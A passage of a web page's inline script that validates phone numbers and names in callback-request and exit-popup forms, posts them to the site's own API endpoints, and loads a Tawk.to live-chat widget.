  //   var emailAddress = document.getElementById("email").value;
  //   AccountKit.login(
  //     'EMAIL',
  //     {emailAddress: emailAddress},
  //     loginCallback
  //   );
  // }
  ////////////////////////////////////////////////////////

  $(document).ready(function($) {
    $('[name="form"] > div > input').on('keyup', function (e) {
      e.preventDefault();
      if (e.keyCode == 13) {
          smsLogin();
      }
    });
    $('[name="submit"]').on('click',function(e) {
        e.preventDefault();
        smsLogin();
     });
    $('.requestCall').on('click',function(e) {
        e.preventDefault();
        e.stopPropagation();
        requestCall();
    });
    $('#exitsubmit').on('click',function(e) {
        e.preventDefault();
        e.stopPropagation();
        //requestCall();
        console.log('testtest');
    });
  });
  
function requestCall(){
	if(!/^[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}$/im.test($('[name="phone2"]').val())){
	    $('[name="phone2"]').focus();
	    toastr.error("Please check phone number!");
	    return;
	}
	console.log('rc function');
	$.ajax({
	   url: 'api/v01/requestCall',
	   type: 'POST',
	   dataType: 'JSON',
	   data:{
	     phone_number:$('[name="phone2"]').val(),
	     source:document.domain,
	   }
	  })
	  .done(function(data) {
	    toastr.success('Call requested!');
	    $('[name="phone2"]').val(getInfo.country_calling_code);
	  })
	  .fail(function(error) {
	   console.log(error.responseText);
	   toastr.error('An error ocurred!');
	  })
	  .always(function() {
	  });
}

function dontMiss(){
  if ($('[name="name_exit"]').val()=='' || $('[name="name_exit"]').val().match(/\b\w+\b/g).length<2 ) {
      $('[name="name_exit"]').focus();
      toastr.error("Name not valid!");
      return;
    }

  if(!/^[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}$/im.test($('[name="phone_exit"]').val())){
      $('[name="phone_exit"]').focus();
      toastr.error("Please check phone number!");
      return;
  }
  console.log('dont miss function');
  $.ajax({
     url: 'api/v01/dontMiss',
     type: 'POST',
     dataType: 'JSON',
     data:{
       name: $('[name="name_exit"]').val(),
       phone_number: $('[name="phone_exit"]').val(),
       source: document.domain,
     }
    })
    .done(function(data) {
      toastr.success('Its on the way!');
      $('[name="phone_exit"]').val(getInfo.country_calling_code);
      $('#popup').css('display','none');
    })
    .fail(function(error) {
     console.log(error.responseText);
     toastr.error('An error ocurred!');
    })
    .always(function() {
    });
}
</script>











<!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5b101be410b99c7b36d481fc/1cfsoptev';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->